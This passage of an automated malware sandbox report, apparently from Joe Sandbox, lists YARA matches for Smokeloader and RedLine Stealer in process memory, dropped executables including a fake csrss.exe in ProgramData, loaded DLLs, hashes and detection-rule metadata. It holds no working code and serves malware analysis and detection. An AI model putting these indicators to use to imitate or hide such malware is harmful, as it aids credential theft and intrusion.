                      Source: Yara matchFile source: 00000012.00000003.2673791095.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2725411734.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2209831726.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3064229344.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000006.00000002.2580124237.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000019.00000002.3064197285.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000C.00000002.2636286578.00000000009B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000012.00000002.2725479628.0000000000A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000012.00000002.2725132501.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000006.00000002.2580234066.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000D.00000002.2581619719.000000000269C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000012.00000002.2725606153.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000006.00000002.2579756154.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000015.00000002.2824529669.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000012.00000002.2725411734.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000000.00000002.2209438963.0000000000919000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000019.00000002.3064656629.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2209831726.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000019.00000002.3064229344.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000C.00000002.2635807336.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000000.00000002.2209182155.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000017.00000002.2876036619.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 360
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041804F0_2_0041804F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138E10_2_004138E1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004128F40_2_004128F4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004134F90_2_004134F9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004131270_2_00413127
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412D890_2_00412D89
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004185A00_2_004185A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004199B40_2_004199B4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417AFE0_2_00417AFE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414E810_2_00414E81
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_0041804F6_2_0041804F
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004138E16_2_004138E1
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004128F46_2_004128F4
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004134F96_2_004134F9
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004131276_2_00413127
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_00412D896_2_00412D89
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004185A06_2_004185A0
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004199B46_2_004199B4
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_00417AFE6_2_00417AFE
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_00414E816_2_00414E81
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04A810009_2_04A81000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04A8112C9_2_04A8112C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04A83AEC9_2_04A83AEC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04A81B609_2_04A81B60
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04A819B89_2_04A819B8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04A8157C9_2_04A8157C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04A84BDC9_2_04A84BDC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA12909_2_04BA1290
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA87909_2_04BA8790
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA9C209_2_04BA9C20
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA7B109_2_04BA7B10
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA7E009_2_04BA7E00
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA78709_2_04BA7870
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA8B409_2_04BA8B40
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA95A09_2_04BA95A0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA92909_2_04BA9290
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA83909_2_04BA8390
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA80D09_2_04BA80D0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA8E209_2_04BA8E20
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA10009_2_04BA1000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BAD0409_2_04BAD040
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0065C02310_2_0065C023
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00612D1010_2_00612D10
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006B439F10_2_006B439F
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067C42C10_2_0067C42C
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006908D010_2_006908D0
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067C95510_2_0067C955
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067CE9110_2_0067CE91
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00690F8010_2_00690F80
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0069509F10_2_0069509F
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0068D2AB10_2_0068D2AB
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0069509F10_2_0069509F
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006914C010_2_006914C0
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0065571110_2_00655711
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0065571110_2_00655711
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00679D9910_2_00679D99
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0068E04010_2_0068E040
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067A1B310_2_0067A1B3
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0065E23910_2_0065E239
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067A5DF10_2_0067A5DF
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067A9F910_2_0067A9F9
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0061269910_2_00612699
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0069ED9610_2_0069ED96
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067AE6A10_2_0067AE6A
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067B2EE10_2_0067B2EE
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067B75F10_2_0067B75F
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0069FABE10_2_0069FABE
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067BB9D10_2_0067BB9D
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006AFD7510_2_006AFD75
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A7DC910_2_006A7DC9
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_0067BFEE10_2_0067BFEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09121A2011_2_09121A20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09DA0B2011_2_09DA0B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09DA13F011_2_09DA13F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09DAD3B011_2_09DAD3B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09DA07D811_2_09DA07D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0AFEB29811_2_0AFEB298
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0AFE13C011_2_0AFE13C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0AFE893811_2_0AFE8938
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0AFE749811_2_0AFE7498
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_0AFE650811_2_0AFE6508
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09121A1211_2_09121A12
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00401DCF12_2_00401DCF
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00401DD512_2_00401DD5
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00401DE512_2_00401DE5
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00401DA312_2_00401DA3
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00401DA412_2_00401DA4
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00401DAF12_2_00401DAF
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00401DBC12_2_00401DBC
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_0041020812_2_00410208
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00410E0D12_2_00410E0D
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00414C2512_2_00414C25
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00410A3B12_2_00410A3B
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_004146D412_2_004146D4
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_0041069D12_2_0041069D
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_0041517612_2_00415176
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00411D0212_2_00411D02
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_004111F512_2_004111F5
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_0041658A12_2_0041658A
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00961E1612_2_00961E16
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00961E0A12_2_00961E0A
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00961E0B12_2_00961E0B
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00961E3612_2_00961E36
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00961E3C12_2_00961E3C
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00961E2312_2_00961E23
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00961E4C12_2_00961E4C
                      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 20uave.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: 20uave.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: csunsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: swift.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: nfhwcrhk.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: surewarehook.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: csunsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: aep.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: atasi.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: swift.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: nfhwcrhk.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: nuronssl.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: surewarehook.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: ubsec.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: aep.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: atasi.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: swift.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: nfhwcrhk.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: nuronssl.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: surewarehook.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: ubsec.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeSection loaded: coreuicomponents.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: csunsapi.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: swift.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: nfhwcrhk.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: surewarehook.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: csunsapi.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: swift.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: nfhwcrhk.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: surewarehook.dll
                      Source: Joe Sandbox ViewDropped File: C:\ProgramData\Drivers\csrss.exe 9D3C881C29156B8FD82CED7C7726C4C65D4E741533C9F886112F440698B1469D
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\451C.dll E45C40410E9C94C3522E465D7DAB52266E56D5F815DC4FC9C4D3F3CF18D877F4
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\4888.exe C8F9BFA859FC17E05A929289872E153807149E1313968A566CE6F74C1092E4E1
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000006.00000002.2580124237.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000019.00000002.3064197285.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000C.00000002.2636286578.00000000009B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000012.00000002.2725479628.0000000000A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000012.00000002.2725132501.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000006.00000002.2580234066.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000D.00000002.2581619719.000000000269C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000012.00000002.2725606153.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000006.00000002.2579756154.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000015.00000002.2824529669.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000012.00000002.2725411734.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000000.00000002.2209438963.0000000000919000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000019.00000002.3064656629.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2209831726.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000019.00000002.3064229344.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
